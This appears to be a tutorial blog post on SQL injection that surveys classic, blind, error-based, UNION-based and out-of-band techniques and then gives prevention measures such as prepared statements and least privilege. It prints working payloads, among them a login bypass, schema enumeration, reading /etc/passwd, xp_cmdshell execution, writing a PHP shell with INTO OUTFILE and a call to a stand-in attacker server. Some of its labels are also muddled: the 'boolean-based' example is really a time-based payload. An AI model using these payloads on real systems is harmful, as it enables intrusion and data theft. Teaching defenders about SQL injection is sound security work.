Introduction
SQL Injection (SQLi) is a critical web security vulnerability that allows attackers to manipulate a website's database by injecting malicious SQL queries. Despite awareness, it remains one of the most prevalent threats, often leading to data breaches, unauthorized access, and even complete server takeover. In this article, we will explore advanced SQLi techniques, real-world exploitation methods, and robust prevention mechanisms.
Types of SQL Injection
1. Classic SQL Injection
Basic SQL Injection manipulates input fields to modify SQL queries. The most common example is bypassing login authentication:
SELECT * FROM users WHERE username = '' OR '1'='1' -- ' AND password = 'password';
The OR '1'='1' condition always evaluates to TRUE, granting unauthorized access.
2. Blind SQL Injection
In Blind SQLi, attackers infer database information by observing system responses or delays.
- Boolean-based Blind SQLi
SELECT * FROM users WHERE username = 'admin' AND IF(1=1, sleep(5), false);
If the application delays for 5 seconds, the attacker confirms SQL injection vulnerability.
-
Time-based Blind SQLi exploits database functions like
SLEEP(),BENCHMARK(), orWAITFOR DELAY.
3. Error-Based SQL Injection
This technique extracts information by triggering database errors:
SELECT * FROM users WHERE id = 1 UNION SELECT @@version, NULL, NULL;
If the database error discloses version information, SQLi is possible.
4. UNION-Based SQL Injection
Attackers use UNION to merge malicious queries with the original SQL statement:
SELECT username, password FROM users WHERE id = 1 UNION SELECT database(), user();
This reveals database names and user details.
5. Out-of-Band SQL Injection
Exploiting SQL functions to send data to an external server:
SELECT LOAD_FILE('\\attacker-server.com\data');
This method is effective when error messages and time delays are unavailable.
Exploitation Techniques
Identifying Vulnerable Parameters
-
Using special characters: Inject
",--,#,/*to test response changes. - Testing UNION-based SQLi:
' UNION SELECT 1,2,3--
-
Checking database type:
- MySQL:
SELECT version(); - MSSQL:
SELECT @@version; - PostgreSQL:
SELECT current_database();
- MySQL:
Advanced Payloads
- Extracting table names:
UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database();
- Extracting column names:
UNION SELECT column_name FROM information_schema.columns WHERE table_name='users';
- Reading files (MySQL):
UNION SELECT LOAD_FILE('/etc/passwd');
Privilege Escalation & Database Takeover
If xp_cmdshell is enabled in MSSQL:
EXEC xp_cmdshell 'whoami';
For MySQL with secure_file_priv disabled:
SELECT 'malicious_code' INTO OUTFILE '/var/www/html/shell.php';
Prevention Techniques
1. Use Prepared Statements (Parameterized Queries)
Instead of concatenating user input, use prepared statements:
cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (user, pass))
This ensures user input is treated as data, not executable SQL.
2. Input Validation & Whitelisting
- Enforce strict input validation.
- Allow only expected characters (e.g., regex restrictions on usernames and IDs).
3. Least Privilege Principle
- Use read-only database users when possible.
- Restrict access to critical system tables.
4. Web Application Firewalls (WAFs)
Deploy WAFs like ModSecurity to detect and block SQLi attempts.
5. Monitor & Log Database Activities
Enable query logging and set up alerts for suspicious database queries.
6. Disable Dangerous Features
- Disable
xp_cmdshellin MSSQL. - Restrict
LOAD_FILE()andOUTFILEin MySQL.
Conclusion
SQL Injection remains a severe threat, but by employing a multi-layered defense, developers can significantly reduce the risk. Regular code audits, input sanitization, and security best practices are essential in preventing SQLi attacks. Stay informed, test your applications, and secure your databases against evolving threats.
Top comments (0)